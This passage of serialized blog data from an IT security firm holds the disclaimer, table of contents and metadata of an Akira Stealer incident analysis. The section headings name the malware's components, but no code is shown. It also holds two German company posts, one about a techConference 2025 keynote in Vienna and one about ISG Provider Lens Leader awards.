operational use of any such code is explicitly discouraged. Readers must understand that while this material serves a research and awareness function, it inherently carries a risk profile that should not be underestimated.",[806,18781,18782],{},"Only trained professionals operating within legally authorized environments—such as accredited security teams, SOC units, academic researchers, or malware labs—should engage with the techniques or code described. All experimentation must be confined to isolated, non-production systems, and comply with applicable laws, internal policies, and ethical standards.",[806,18784,18785],{},"We do not provide support or validation for any reproduced code or behavior. There is no guarantee of accuracy, relevance, or completeness. Furthermore, we explicitly reject any use of this content for offensive purposes, unauthorized red teaming, commercial malware development, or adversarial testing outside a legally defined scope. Any misuse may lead to legal consequences. glueckkanja AG disclaims all responsibility for direct or indirect damages arising from the use or misinterpretation of this content.",[806,18787,18788],{},"By continuing to read or reference this content, you acknowledge the above and agree not to misuse, replicate, or apply any part of it in unlawful or unethical contexts. When in doubt, consult your legal, compliance, or data protection office before engaging with live code analysis or similar technical material.",[806,18790,18791],{},"This publication is provided \"as is,\" without warranty, support, or liability.",[3604,18793,18794],{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html pre.shiki code .s9eBZ, html code.shiki .s9eBZ{--shiki-default:#22863A;--shiki-dark:#85E89D}",{"title":863,"searchDepth":864,"depth":864,"links":18796},[18797,18798,18799,18800,18811,18812,18813,18814,18815,18816,18817,18818,18820,18821,18822,18823,18824,18825,18826,18827,18828,18831,18839,18840,18841,18847,18865,18883,18884,18885,18886,18894,18901,18908,18917,18924,18925,18926,18927,18928,18929,18930,18931,18932,18933,18934,18935,18936,18937,18938,18939],{"id":6766,"depth":864,"text":6767},{"id":6814,"depth":864,"text":6815},{"id":6834,"depth":864,"text":6835},{"id":6888,"depth":864,"text":6889,"children":18801},[18802,18803,18805,18807,18809],{"id":6908,"depth":1814,"text":6909},{"id":6960,"depth":1814,"text":18804},"2.1.2 Updater.exe – Initial Loader",{"id":7065,"depth":1814,"text":18806},"2.1.3 main.exe – Obfuscated NodeJS Payload Container",{"id":7183,"depth":1814,"text":18808},"2.1.4 cmd.exe & PowerShell Relay",{"id":7293,"depth":1814,"text":18810},"2.1.5 python.exe with astor.py",{"id":7427,"depth":864,"text":7428},{"id":7510,"depth":864,"text":7511},{"id":7588,"depth":864,"text":7589},{"id":7667,"depth":864,"text":7668},{"id":7734,"depth":864,"text":7735},{"id":7814,"depth":864,"text":7815},{"id":7923,"depth":864,"text":7924},{"id":8040,"depth":864,"text":18819},"4.2 AMSI Bypass Technique (Class: gofor4msi)",{"id":8224,"depth":864,"text":8225},{"id":8345,"depth":864,"text":8346},{"id":8443,"depth":864,"text":8444},{"id":8539,"depth":864,"text":8540},{"id":8614,"depth":864,"text":8615},{"id":8685,"depth":864,"text":8686},{"id":8745,"depth":864,"text":8746},{"id":8880,"depth":864,"text":8881},{"id":8941,"depth":864,"text":8942,"children":18829},[18830],{"id":8953,"depth":1814,"text":8954},{"id":9302,"depth":864,"text":9303,"children":18832},[18833,18834,18835,18836,18837,18838],{"id":9311,"depth":1814,"text":9312},{"id":9425,"depth":1814,"text":9426},{"id":9622,"depth":1814,"text":9623},{"id":9910,"depth":1814,"text":9911},{"id":9986,"depth":1814,"text":9987},{"id":10146,"depth":1814,"text":10147},{"id":10381,"depth":864,"text":10382},{"id":10427,"depth":864,"text":10428},{"id":10439,"depth":864,"text":10440,"children":18842},[18843,18844,18845,18846],{"id":10445,"depth":1814,"text":10446},{"id":10489,"depth":1814,"text":10490},{"id":10551,"depth":1814,"text":10552},{"id":10586,"depth":1814,"text":10587},{"id":10622,"depth":864,"text":18848,"children":18849},"7.3 Anti-Analysis / Evasion (Class: VmProtect)",[18850,18851,18852,18853,18855,18856,18857,18858,18859,18860,18861,18862,18863,18864],{"id":10631,"depth":1814,"text":10632},{"id":10646,"depth":1814,"text":10647},{"id":10686,"depth":1814,"text":10687},{"id":10776,"depth":1814,"text":18854},"7.3.4 VmProtect Architecture",{"id":11129,"depth":1814,"text":11130},{"id":11195,"depth":1814,"text":11196},{"id":11264,"depth":1814,"text":11265},{"id":11328,"depth":1814,"text":11329},{"id":11396,"depth":1814,"text":11397},{"id":11453,"depth":1814,"text":11454},{"id":11551,"depth":1814,"text":11552},{"id":11621,"depth":1814,"text":11622},{"id":12077,"depth":1814,"text":12078},{"id":12124,"depth":1814,"text":12125},{"id":12138,"depth":864,"text":12139,"children":18866},[18867,18868,18870,18872,18874,18876,18878,18880,18882],{"id":12297,"depth":1814,"text":12298},{"id":12405,"depth":1814,"text":18869},"7.4.2 Password Dumper (Chromium.GetPasswords)",{"id":12527,"depth":1814,"text":18871},"7.4.3 Credit Card Dumper (Chromium.GetCreditCards)",{"id":12609,"depth":1814,"text":18873},"7.4.4 Cookie Dumper (Chromium.GetCookies)",{"id":12689,"depth":1814,"text":18875},"7.4.5 Google Session Dumper (Chromium.dump_google_sessions)",{"id":12816,"depth":1814,"text":18877},"7.4.6 History Dumper (Chromium.GetHistory)",{"id":12886,"depth":1814,"text":18879},"7.4.7 Autofill Dumper (Chromium.GetAutofills)",{"id":12949,"depth":1814,"text":18881},"7.4.8 Firefox Profile Grabber (GeckoDriver & grabFirefoxProfiles)",{"id":13027,"depth":1814,"text":13028},{"id":13066,"depth":864,"text":13067},{"id":13398,"depth":864,"text":13399},{"id":13512,"depth":864,"text":13513},{"id":13840,"depth":864,"text":13841,"children":18887},[18888,18889,18890,18891,18892,18893],{"id":13849,"depth":1814,"text":13850},{"id":14000,"depth":1814,"text":14001},{"id":14106,"depth":1814,"text":14107},{"id":14231,"depth":1814,"text":14232},{"id":14298,"depth":1814,"text":14299},{"id":14423,"depth":1814,"text":14424},{"id":14528,"depth":864,"text":18895,"children":18896},"7.9. Discord and Telegram Token Theft (Class: Discord)",[18897,18898,18899,18900],{"id":14542,"depth":1814,"text":14543},{"id":14673,"depth":1814,"text":14674},{"id":14916,"depth":1814,"text":14917},{"id":14997,"depth":1814,"text":14998},{"id":15067,"depth":864,"text":15068,"children":18902},[18903,18905,18906,18907],{"id":15080,"depth":1814,"text":18904},"7.10.1 Data Class Initialization",{"id":15178,"depth":1814,"text":15179},{"id":15298,"depth":1814,"text":15299},{"id":15363,"depth":1814,"text":15364},{"id":15440,"depth":864,"text":18909,"children":18910},"7.11 File Grabber (Class: Utils.steal_files)",[18911,18912,18913,18914,18915,18916],{"id":15452,"depth":1814,"text":15453},{"id":15523,"depth":1814,"text":15524},{"id":15585,"depth":1814,"text":15586},{"id":15618,"depth":1814,"text":15619},{"id":15647,"depth":1814,"text":15648},{"id":15826,"depth":1814,"text":15827},{"id":15934,"depth":864,"text":15935,"children":18918},[18919,18920,18921,18922,18923],{"id":15943,"depth":1814,"text":15944},{"id":15958,"depth":1814,"text":15959},{"id":16037,"depth":1814,"text":16038},{"id":16186,"depth":1814,"text":16187},{"id":16419,"depth":1814,"text":16420},{"id":16770,"depth":864,"text":16771},{"id":16801,"depth":864,"text":16802},{"id":16925,"depth":864,"text":16926},{"id":17036,"depth":864,"text":17037},{"id":17087,"depth":864,"text":17088},{"id":17264,"depth":864,"text":17265},{"id":17314,"depth":864,"text":17315},{"id":17358,"depth":864,"text":17359},{"id":17398,"depth":864,"text":17399},{"id":17489,"depth":864,"text":17490},{"id":17506,"depth":864,"text":17507},{"id":18029,"depth":864,"text":18030},{"id":18335,"depth":864,"text":18336},{"id":18456,"depth":864,"text":18457},{"id":18519,"depth":864,"text":18520},{"id":18691,"depth":864,"text":18692},{"lang":953,"seoTitle":18941,"titleClass":873,"date":18942,"categories":18943,"blogtitlepic":18944,"socialimg":18945,"customExcerpt":18946,"keywords":18947,"maxContent":508,"asideNav":18948,"footer":18997,"contactInContent":18998,"published":508,"hreflang":19032},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[371],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat Protection",{"menuItems":18949},[18950,18952,18955,18958,18961,18964,18967,18970,18973,18976,18979,18982,18985,18988,18991,18994],{"href":18951,"text":6597},"#prologue",{"href":18953,"text":18954},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":18956,"text":18957},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":18959,"text":18960},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":18962,"text":18963},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":18965,"text":18966},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":18968,"text":18969},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":18971,"text":18972},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":18974,"text":18975},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":18977,"text":18978},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":18980,"text":18981},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira Ecosystem",{"href":18983,"text":18984},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":18986,"text":18987},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":18989,"text":18990},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":18992,"text":18993},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":18995,"text":18996},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":508},{"quote":749,"infos":18999},{"bgColor":19000,"color":884,"boxBgColor":19001,"boxColor":19002,"headline":19003,"subline":19004,"level":810,"textStyling":887,"flush":888,"person":19005,"form":19012},"var(--color-gk-violet)","var(--color-gk-yellow)","var(--color-copy)","Get in touch now","As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. Let´s talk and strengthen your cyber defenses together!",{"image":19006,"cloudinary":508,"alt":19007,"name":19007,"detailsHeader":19008,"details":19009},"/people/people-pam-team.png","Project & Account Management","We look forward to hearing from you!",[19010,19011],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":19013,"cta":19014,"method":870,"action":908,"fields":19015},"Send",{"skin":907},[19016,19017,19019,19022,19025,19028,19030,19031],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19018},"Please enter your name.",{"label":19020,"type":916,"id":612,"required":508,"requiredMsg":19021},"Company*","Please enter your company.",{"label":19023,"type":924,"id":924,"required":508,"requiredMsg":19024},"Email address*","Please enter your email address.",{"label":19026,"type":933,"id":934,"required":508,"requiredMsg":19027},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","Please confirm",{"type":911,"id":942,"value":19029},"Form: Blog MSSP 2025 | EN",{"type":911,"id":945,"value":946},{"type":911,"id":948},[19033,19035],{"lang":953,"href":19034},"/en/posts/2025-06-16-quiet-breach",{"lang":956,"href":19036},"/es/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":6590,"description":816},"posts/2025-06-16-quiet-breach",[19041,3709,3713,19042],"Microsoft 365 Defender","Incident Deep Dive","dg8ndC-OFDBkSSEfhAd2U7FsvjkUT6y5G-ckVtDqMcY",{"id":19045,"title":19046,"author":19047,"body":19048,"cta":764,"description":863,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19233,"moment":19235,"navigation":508,"path":19282,"seo":19283,"stem":19284,"tags":19285,"webcast":749,"__hash__":19288},"content_de/posts/2025-05-25-tech-conference-2025.md","Wien. Microsoft. Wir. – Auf der techConference 2025.",[801],{"type":803,"value":19049,"toc":19228},[19050,19054,19056,19059,19068,19077,19081,19083,19090,19093,19096,19099,19133,19138,19180,19183,19187,19189,19196,19199,19222,19225],[810,19051,19053],{"id":19052},"warum-techconference","Warum techConference?",[806,19055,816],{},[806,19057,19058],{},"Am 3. und 4. Juni 2025 wird Wien zum Hotspot für Tech-Innovation – und wir sind mittendrin. Als Platinum Partner der techConference 2025 zeigen wir nicht nur Präsenz, sondern setzen ein klares Zeichen: für Resilienz, für Cloud-Infrastruktur made in Austria und für eine Partnerschaft mit Microsoft, die mehr kann als Buzzwords.",[806,19060,19061,19062,19067],{},"Im Zentrum unseres Auftritts: ",[833,19063,19066],{"href":19064,"rel":19065},"https://www.glueckkanja.com/de/azure/azure-emergency-response-environment",[1410],"Azure Emergency Response Environment (AzERE)"," – unsere Plattform für Azure Emergency Response Environments. Sie ermöglicht Unternehmen, im Ernstfall blitzschnell wieder handlungsfähig zu sein. Ob Ransomware, Systemausfall oder Kommunikationsbruch: AzERE bringt kritische Prozesse und Identitäten in kürzester Zeit zurück in den Betrieb. In unserer Keynote zeigen wir das live – gemeinsam mit Christoph Schacher, CISO von Wienerberger, der aus erster Hand berichtet, wie AzERE zum Game-Changer in seiner Sicherheitsstrategie wurde.",[806,19069,19070,19071,19076],{},"Gleichzeitig fällt auf der techConference auch der Startschuss für eine neue Ära: ",[833,19072,19075],{"href":19073,"rel":19074},"https://www.glueckkanja.com/de/azure/azure-goes-austria",[1410],"der Launch der Microsoft Cloudregion Österreich",". Wir freuen uns, offizieller Launchpartner zu sein – und unterstützen Unternehmen dabei, diese Infrastruktur ab dem ersten Tag effizient und sicher zu nutzen. Das bedeutet: Datenhaltung in Österreich, Compliance-by-Design, noch schnellere Performance – und ein starkes Signal für digitale Souveränität im Land.",[810,19078,19080],{"id":19079},"wenn-alles-ausfällt-zählt-nur-eins-geschwindigkeit","Wenn alles ausfällt, zählt nur eins: Geschwindigkeit.",[806,19082,816],{},[806,19084,19085,19086,19089],{},"Am ",[1736,19087,19088],{},"4. Juni (Tag 2) um 9 Uhr im Raum Terminator"," zeigen wir in unserer Keynote auf der techConference, wie Unternehmen in der Krise handlungsfähig bleiben. Nicht theoretisch – sondern mit System.",[806,19091,19092],{},"AzERE ist unsere Antwort auf den Worst Case: Eine Plattform, mit der kritische Prozesse und Kommunikation nach einem Angriff in Minuten wieder anlaufen. Kein Reboot, kein Rätselraten – sondern ein klarer Plan für den Ernstfall.",[806,19094,19095],{},"Auf der Bühne: Jan Geisbauer und Florian Stöckl, die zeigen, wie AzERE funktioniert. Und Christoph Schacher, CISO von Wienerberger, der erklärt, warum sein Unternehmen genau darauf setzt – und wie daraus ein strategischer Vorteil wurde.",[3604,19097,19098],{},"\n body {\n margin: 0;\n background-color: #f9f9f9;\n }\n\n .gallery-container {\n display: grid;\n grid-template-columns: repeat(3, 1fr);\n gap: 20px;\n padding: 10px;\n max-width: 600px;\n }\n\n .gallery-container img {\n width: 100%;\n height: 100%;\n object-fit: cover;\n }\n\n .gallery-item {\n display: flex;\n flex-direction: column;\n }\n\n .caption {\n margin-top: 10px;\n font-size: 16px;\n text-align: center;\n }\n ",[1541,19100,1909,19103,1909,19115,1909,19124,1905],{"className":19101},[19102],"gallery-container",[1541,19104,1913,19107,1913,19110,1909],{"className":19105},[19106],"gallery-item",[1449,19108],{"src":19109,"alt":1180},"https://res.cloudinary.com/c4a8/image/upload/events/christoph-schacher.jpg",[1541,19111,19114],{"className":19112},[19113],"caption","Christoph Schacher",[1541,19116,1913,19118,1913,19121,1909],{"className":19117},[19106],[1449,19119],{"src":19120,"alt":1226},"https://res.cloudinary.com/c4a8/image/upload/events/Florian.Stoeckl.648.jpg",[1541,19122,1226],{"className":19123},[19113],[1541,19125,1913,19127,1913,19130,1909],{"className":19126},[19106],[1449,19128],{"src":19129,"alt":1127},"https://res.cloudinary.com/c4a8/image/upload/events/Jan.Geisbauer.648.png",[1541,19131,1127],{"className":19132},[19113],[1541,19134],{"className":19135},[19136,19137],"container","space-bottom-2",[1541,19139,1909,19140,1905],{},[833,19141,19148,1913,19151],{"role":3858,"className":19142,"dataText":19146,"href":19147,"target":513},[3860,3861,19143,19144,3862,19145,3863],"w-100","w-lg-auto","cta--external","Zum Programm","https://techconference.at/agenda",[1588,19149,19146],{"className":19150},[3872],[1588,19152,19158],{"className":19153,"style":19157},[19154,19155,19156,3863],"icon","icon--right","icon--arrow-external","--color-icon: currentColor; --icon-rotation: 0deg;",[19159,19160,19169,19170,19169,19176,19179],"svg",{"viewBox":19161,"width":19162,"height":19162,"padding":19163,"xmlSpace":19164,"version":19165,"xmlns":19166,"xmlns:link":19167,"style":19168},"0 0 34 34","28px","6","preserve","1.1","http://www.w3.org/2000/svg","http://www.w3.org/1999/xlink","stroke: currentcolor; transform: rotate(var(--icon-rotation)) scale(var(--icon-scale));","\n ",[19171,19172],"path",{"d":19173,"transform":19174,"style":19175},"M33.23,2.39,1.79,33.79","translate(-0.79 -0.79)","fill: none; stroke-linecap: round; stroke-linejoin: round; stroke-width: 3;",[19171,19177],{"d":19178,"transform":19174,"style":19175},"M33.79,33.79v-30a2,2,0,0,0-2-2h-30","\n ",[1541,19181],{"className":19182},[19136,19137],[810,19184,19186],{"id":19185},"noch-ein-highlight-unser-webcast-live-aus-wien","Noch ein Highlight: unser Webcast live aus Wien.",[806,19188,816],{},[806,19190,19191,19192,19195],{},"Kurz nach der techConference geht es direkt weiter: ",[1736,19193,19194],{},"Am 12. Juni um 11:00 Uhr"," senden wir live aus Wien unseren Webcast \"Windows 365: Klartext zur Praxis und Lizenzierung\". Gemeinsam mit Andreas Leitgeb von Microsoft Österreich liefert Timo Herzig (glueckkanja) in 45 Minuten alles, was IT-Entscheider jetzt über Windows 365 wissen müssen – kompakt, verständlich, praxisnah.",[806,19197,19198],{},"Im Fokus: reale Use Cases, aktuelle Lizenzmodelle, Einsatzszenarien für Österreich – plus eine Live-Demo, wie der Einstieg mit einem Link Device in der Praxis aussieht. Im Anschluss beantworten wir live eure Fragen im Q&A.",[1541,19200,1909,19202,1909,19212,1905],{"className":19201},[19102],[1541,19203,1913,19205,1913,19209,1909],{"className":19204},[19106],[1449,19206],{"src":19207,"alt":19208},"https://res.cloudinary.com/c4a8/image/upload/events/andreas-leitgeb.jpg","Andreas Leitgeb",[1541,19210,19208],{"className":19211},[19113],[1541,19213,1913,19215,1913,19219,1909],{"className":19214},[19106],[1449,19216],{"src":19217,"alt":19218},"https://res.cloudinary.com/c4a8/image/upload/events/Timo.Herzig.648.jpg","Timo Herzig",[1541,19220,19218],{"className":19221},[19113],[1541,19223],{"className":19224},[19136,19137],[806,19226,19227],{},"Neugierig geworden? Dann kommt bei uns am Stand vorbei. Wir freuen uns auf den Austausch – über Cloud, Resilienz und alles, was euch sonst gerade umtreibt.",{"title":863,"searchDepth":864,"depth":864,"links":19229},[19230,19231,19232],{"id":19052,"depth":864,"text":19053},{"id":19079,"depth":864,"text":19080},{"id":19185,"depth":864,"text":19186},{"seoTitle":19234,"titleClass":873,"date":19235,"categories":19236,"blogtitlepic":19237,"socialimg":19238,"customExcerpt":19239,"keywords":19240,"hreflang":19241,"footer":19246,"contactInContent":19247,"scripts":19281},"Wie wir bei der techConference 2025 gleich dreifach Geschichte schreiben","2025-05-25",[876],"head-tech-conference.png","/blog/heads/head-tech-conference.png","Was passiert, wenn die Cloud in Österreich landet? Wenn Tech-Entscheider, Cybersecurity-Pioniere und Microsoft-Profis aufeinandertreffen? Dann ist techConference – und wir mittendrin. Nicht nur als Platinum Partner, nicht nur mit Booth und Session. Sondern auch als offizieller Launchpartner Virtualisierung für die neue Microsoft Cloudregion Österreich.","Microsoft Partner Schweiz, Managed Services Azure Schweiz, Microsoft 365 Services Schweiz, IT Dienstleister Schweiz, Cloud Services Schweiz, ISG Provider Lens Schweiz, glueckkanja Schweiz, Microsoft Cloud Schweiz, Rising Star ISG 2025, IT Sicherheit Schweiz, Digitalisierung Unternehmen Schweiz, Azure Services Bern, Microsoft 365 Beratung Schweiz, glueckkanja, glueckkanja Bern, glueckkanja Microsoft Services",[19242,19244],{"lang":953,"href":19243},"/blog/corporate/2025/05/tech-conference-2025-en",{"lang":956,"href":19245},"/blog/corporate/2025/05/tech-conference-2025-es",{"noMargin":508},{"quote":508,"infos":19248},{"bgColor":883,"headline":19249,"subline":19250,"level":810,"textStyling":887,"flush":888,"person":19251,"form":19260},"Studie anfordern","Du möchtest tiefer in die Studienergebnisse eintauchen? Dann melde dich gern bei uns – wir schicken dir die vollständige ISG-Übersicht mit unseren Skills und Stärken zu.",{"image":19252,"cloudinary":508,"alt":1107,"name":1107,"quotee":1107,"quoteeTitle":19253,"quote":19254,"detailsHeader":895,"details":19255},"/people/people-michael-breither.jpg","COO","Die Rising Star-Auszeichnung zeigt, dass unser Ansatz auch in der Schweiz überzeugt: standardisierte, sichere Microsoft-Services – pragmatisch umgesetzt und mit echtem Mehrwert für unsere Kunden.",[19256,19257],{"text":762,"href":898,"details":899,"icon":900},{"text":19258,"href":19259,"icon":903},"sales@glueckkanja.com","mailto:sales@glueckkanja.com",{"ctaText":905,"cta":19261,"method":870,"action":908,"fields":19262},{"skin":907},[19263,19264,19266,19268,19271,19272,19274,19275,19277,19279,19280],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":19265},"Bitte Namen eingeben.",{"label":920,"type":916,"id":612,"required":508,"requiredMsg":19267},"Bitte Unternehmen eingeben.",{"label":19269,"type":924,"id":924,"required":508,"requiredMsg":19270},"Email-Adresse*","Bitte E-Mail-Adresse eingeben.",{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":19273,"type":933,"id":934,"required":508,"requiredMsg":935},"Deine Daten werden zur Bearbeitung und Beantwortung deiner Anfrage bei uns gespeichert. Weitere Informationen zum Datenschutz findest du in unserer \u003Ca href=\"/de/datenschutz\">Datenschutzerklärung\u003C/a>.",{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":19276},"CH",{"type":911,"id":942,"value":19278},"Form: Blog ISG Switzerland | DE",{"type":911,"id":945,"value":946},{"type":911,"id":948},{"slick":508},"/posts/2025-05-25-tech-conference-2025",{"title":19046,"description":863},"posts/2025-05-25-tech-conference-2025",[19286,19287],"Austria","Event","G9DtkThLljKUBNle58uZR2t6KXclMLgUUxLm-oCG4co",{"id":19290,"title":19291,"author":19292,"body":19293,"cta":764,"description":19297,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":19388,"moment":19390,"navigation":508,"path":19437,"seo":19438,"stem":19439,"tags":19440,"webcast":749,"__hash__":19442},"content_de/posts/2025-05-08-isg-germany-2025.md","Vier gewinnt. glueckkanja erneut Leader bei ISG",[801],{"type":803,"value":19294,"toc":19381},[19295,19298,19301,19305,19307,19310,19314,19316,19322,19327,19331,19333,19339,19344,19348,19350,19356,19361,19365,19367,19373,19378],[806,19296,19297],{},"Einmal ist keinmal, sagt man. Zweimal ist doppelt gut, und erst beim Triple geht’s mit dem Zählen los. So gesehen gehören wir seit diesem Jahr zum Establishment der ISG Provider Lens™-Studie: Denn glueckkanja wurde nach 2021, 2023 und 2024 auch 2025 wieder als Leader im Bereich Microsoft 365 Services und Managed Azure ausgezeichnet.",[806,19299,19300],{},"Als langjähriger Microsoft-Partner bringen wir Unternehmen weltweit in die Cloud – strategisch, sicher und immer mit einem klaren Blick aufs Machbare. Damit leisten wir einen wichtigen Beitrag zur globalen IT-Sicherheit und fördern den innovativen Fortschritt in einer Vielzahl von Geschäftsfeldern. Wir freuen uns, dass diese Leistung auch 2025 erneut von der ISG-Studie anerkannt wurde.",[810,19302,19304],{"id":19303},"isg-provider-lens-studie-2025","ISG Provider Lens™ Studie 2025",[806,19306,816],{},[806,19308,19309],{},"Mit der \"Microsoft Cloud Ecosystem\"-Studie liefert ISG im Rahmen seiner Provider Lens™-Reihe fundierte Einblicke, die Unternehmen bei ihrer strategischen Ausrichtung – von der Positionierung über Partnerschaften bis hin zu Go-to-Market-Ansätzen – unterstützen. Dabei werden die Leistungen der einzelnen Anbieter auf Basis ihres Produktportfolios und ihrer Wettbewerbsfähigkeit in Bezug auf das Microsoft Cloud-Ökosystem bewertet und in die vier Quadranten Product Challenger, Contender, Market Challenger und Leader eingeteilt. So viel zur Studie selbst – kommen wir jetzt zu unseren Studienergebnissen!",[810,19311,19313],{"id":19312},"glueckkanja-ist-leader-microsoft-365-services-midmarket","glueckkanja ist Leader Microsoft 365 Services (Midmarket)",[806,19315,816],{},[806,19317,19318],{},[1449,19319],{"alt":19320,"src":19321},"Microsoft 365 Services - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-midmarket.png",[806,19323,19324],{},[4655,19325,19326],{},"\"glueckkanja treibt die Cloud-Transformation voran, integriert Microsoft 365 und Windows 365 effizient und setzt auf Automatisierung, um IT-Prozesse zu optimieren und die Sicherheit zu gewährleisten!\"",[810,19328,19330],{"id":19329},"glueckkanja-ist-leader-microsoft-365-services-large-accounts","glueckkanja ist Leader Microsoft 365 Services (Large Accounts)",[806,19332,816],{},[806,19334,19335],{},[1449,19336],{"alt":19337,"src":19338},"Microsoft 365 Services - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-m365-services-large-accounts.png",[806,19340,19341],{},[4655,19342,19343],{},"\"glueckkanja optimiert komplexe IT-Landschaften, integriert Microsoft 365 und Windows 365 nahtlos und setzt auf Automatisierung für maximale Skalierbarkeit, Sicherheit und Effizienz.\"",[810,19345,19347],{"id":19346},"glueckkanja-ist-leader-managed-services-for-azure-midmarket","glueckkanja ist Leader Managed Services for Azure (Midmarket)",[806,19349,816],{},[806,19351,19352],{},[1449,19353],{"alt":19354,"src":19355},"Managed Services for Azure - Midmarket","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-midmarket.png",[806,19357,19358],{},[4655,19359,19360],{},"\"glueckkanja ermöglicht sichere, skalierbare Cloud-Strukturen, die Risiken minimieren und die Effizienz steigern. Durch Automatisierung und vorausschauende Governance gewinnen Unternehmen Stabilität, Kontrolle und Zukunftssicherheit.\"",[810,19362,19364],{"id":19363},"glueckkanja-ist-leader-managed-services-for-azure-large-accounts","glueckkanja ist Leader Managed Services for Azure (Large Accounts)",[806,19366,816],{},[806,19368,19369],{},[1449,19370],{"alt":19371,"src":19372},"Managed Services for Azure - Large Enterprises","https://res.cloudinary.com/c4a8/image/upload/blog/pics/2025-isg-quadrant-managed-services-for-azure-large-accounts.png",[806,19374,19375],{},[4655,19376,19377],{},"\"glueckkanja gestaltet die Cloud-Zukunft mit Automatisierung, Governance und Nachhaltigkeit. Durch Infrastructure as Code und iterative Optimierung entstehen resiliente, skalierbare und wirtschaftlich effiziente Lösungen.\"",[806,19379,19380],{},"An dieser Stelle sagen wir herzlich Danke für das viele Lob. Wenn du Lust hast, tiefer in die Studienergebnisse einzutauchen, sag einfach Bescheid – wir schicken dir gerne die vollständige ISG-Übersicht zu.",{"title":863,"searchDepth":864,"depth":864,"links":19382},[19383,19384,19385,19386,19387],{"id":19303,"depth":864,"text":19304},{"id":19312,"depth":864,"text":19313},{"id":19329,"depth":864,"text":19330},{"id":19346,"depth":864,"text":19347},{"id":19363,"depth":864,"text":19364},{"seoTitle":19389,"titleClass":873,"date":19390,"categories":19391,"blogtitlepic":19392,"socialimg":19393,"customExcerpt":19394,"keywords":19395,"hreflang":19396,"footer":19401,"contactInContent":19402,"textImageTeaser":19425},"ISG 2025: glueckkanja erneut Leader für Managed Services for Azure und Microsoft 365 Services","2025-05-08",[876],"head-isg-2025.png","/blog/heads/head-isg-2025.png","Die ISG Provider Lens™-Studie 2025 bestätigt glueckkanja erneut als Leader in den Kategorien Managed Services for Azure und Microsoft 365 Services. Ausgezeichnet wurde in beiden Marktsegmenten: Midmarket und Large Accounts. Damit bestätigt sich, was sich in den letzten Jahren abgezeichnet hat: Wer Standardisierung, Automatisierung und Skalierung für Microsoft-Umgebungen ernst meint, kommt an glueckkanja nicht vorbei.","Microsoft Partner Deutschland, Managed Services Azure 